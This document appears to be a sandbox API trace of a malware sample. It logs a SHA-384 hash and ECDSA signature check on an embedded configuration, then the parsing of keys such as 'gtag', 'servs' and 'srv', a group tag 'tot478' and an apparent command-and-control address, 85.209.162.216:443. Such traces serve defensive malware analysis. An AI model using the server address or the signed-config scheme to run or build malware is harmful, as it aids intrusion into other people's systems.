	[0102.190] CryptAcquireContextW (in: phProv=0x129350, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129350*=0x249f18) returned 1
	[0102.191] CryptCreateHash (in: hProv=0x249f18, Algid=0x800d, hKey=0x0, dwFlags=0x0, phHash=0x129354 | out: phHash=0x129354) returned 1
	[0102.191] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x5dc, dwFlags=0x0) returned 1
	[0102.191] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12934c, pdwDataLen=0x129348, dwFlags=0x0 | out: pbData=0x12934c, pdwDataLen=0x129348) returned 1
	[0102.191] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.191] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x1ec5a8, pdwDataLen=0x12934c, dwFlags=0x0 | out: pbData=0x1ec5a8, pdwDataLen=0x12934c) returned 1
	[0102.191] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.191] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.192] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x129450, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x129450) returned 0x0
	[0102.255] BCryptImportKeyPair (in: hAlgorithm=0x249f18, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x129458, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x129458) returned 0x0
	[0102.258] BCryptGetProperty (in: hObject=0x212650, pszProperty="SignatureLength", pbOutput=0x129470, cbOutput=0x4, pcbResult=0x129448, dwFlags=0x0 | out: pbOutput=0x129470, pcbResult=0x129448) returned 0x0
	[0102.258] BCryptVerifySignature (hKey=0x212650, pPaddingInfo=0x0, pbHash=0x1ec5a8, cbHash=0x30, pbSignature=0x244f64, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0102.262] BCryptDestroyKey (in: hKey=0x212650 | out: hKey=0x212650) returned 0x0
	[0102.262] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x249f18, dwFlags=0x0 | out: hAlgorithm=0x249f18) returned 0x0
	[0102.262] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.262] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x5e0) returned 0x24a3b8
	[0102.262] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x246c00) returned 1
	[0102.262] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248060) returned 1
	[0102.262] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x244988) returned 1
	[0102.262] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248820
	[0102.262] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x180) returned 0x219b38
	[0102.262] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x24a9a0
	[0102.262] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248838
	[0102.262] CharLowerBuffA (in: lpsz="mcconf", cchLength=0x6 | out: lpsz="mcconf") returned 0x6
	[0102.262] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248838) returned 1
	[0102.262] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248838
	[0102.262] CharLowerBuffA (in: lpsz="ver", cchLength=0x3 | out: lpsz="ver") returned 0x3
	[0102.262] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248838) returned 1
	[0102.262] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248838
	[0102.262] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248850
	[0102.262] CharLowerBuffA (in: lpsz="gtag", cchLength=0x4 | out: lpsz="gtag") returned 0x4
	[0102.262] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248850) returned 1
	[0102.262] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248850
	[0102.262] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="servs", cchLength=0x5 | out: lpsz="servs") returned 0x5
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x248060
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245020
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245048
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245070
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245098
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2450c0
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2450e8
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245110
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245138
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245160
	[0102.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.263] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245188
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.264] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.264] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2451b0
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.264] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.264] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2451d8
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.264] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.264] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245200
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.264] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.264] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245228
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.264] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.264] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245250
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.264] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.264] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245278
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.264] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.264] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2452a0
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.264] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.264] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2452c8
	[0102.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.264] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.264] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2452f0
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.265] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.265] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245318
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.265] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.265] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245340
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.265] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.265] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245368
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.265] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.265] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245390
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.265] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.265] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2453b8
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.265] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.265] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2453e0
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.265] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.265] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245408
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.265] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.265] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245430
	[0102.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.266] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245458
	[0102.266] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x219b38, Size=0x300) returned 0x244988
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.266] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245480
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.266] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2454a8
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.266] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2454d0
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.266] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2454f8
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.266] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248868) returned 1
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248868
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248880
	[0102.266] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248880) returned 1
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245520
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248880
	[0102.266] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248880) returned 1
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245548
	[0102.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248880
	[0102.266] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248880) returned 1
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245570
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248880
	[0102.267] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248880) returned 1
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245598
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248880
	[0102.267] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248880) returned 1
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2455c0
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248880
	[0102.267] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248880) returned 1
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2455e8
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248880
	[0102.267] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248880) returned 1
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245610
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248880
	[0102.267] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248880) returned 1
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248880
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248898
	[0102.267] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248898) returned 1
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245638
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248898
	[0102.267] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248898) returned 1
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245660
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248898
	[0102.267] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248898) returned 1
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245688
	[0102.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248898
	[0102.268] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0102.268] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248898) returned 1
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456b0
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248898
	[0102.268] CharLowerBuffA (in: lpsz="autorun", cchLength=0x7 | out: lpsz="autorun") returned 0x7
	[0102.268] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248898) returned 1
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248898
	[0102.268] CharLowerBuffA (in: lpsz="module", cchLength=0x6 | out: lpsz="module") returned 0x6
	[0102.268] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248898) returned 1
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248898
	[0102.268] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0102.268] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248898) returned 1
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248898
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x2488b0
	[0102.268] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3
	[0102.268] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2488b0) returned 1
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x2488b0
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x2488c8
	[0102.268] CharLowerBuffA (in: lpsz="module", cchLength=0x6 | out: lpsz="module") returned 0x6
	[0102.268] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2488c8) returned 1
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x2488c8
	[0102.268] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0102.268] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2488c8) returned 1
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x2488c8
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x2488e0
	[0102.268] CharLowerBuffA (in: lpsz="module", cchLength=0x6 | out: lpsz="module") returned 0x6
	[0102.268] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2488e0) returned 1
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x2488e0
	[0102.268] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0102.268] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2488e0) returned 1
	[0102.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x2488e0
	[0102.268] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x248850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7
	[0102.269] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x2488f8
	[0102.269] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x248850, cbMultiByte=-1, lpWideCharStr=0x2488f8, cchWideChar=7 | out: lpWideCharStr="tot478") returned 7
	[0102.269] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248910
	[0102.269] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x300) returned 0x244c90
	[0102.269] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x248060, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.269] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.269] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x248060, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="85.209.162.216:443") returned 19
	[0102.269] StrStrIW (lpFirst="85.209.162.216:443", lpSrch=":") returned=":443"
	[0102.269] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.269] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
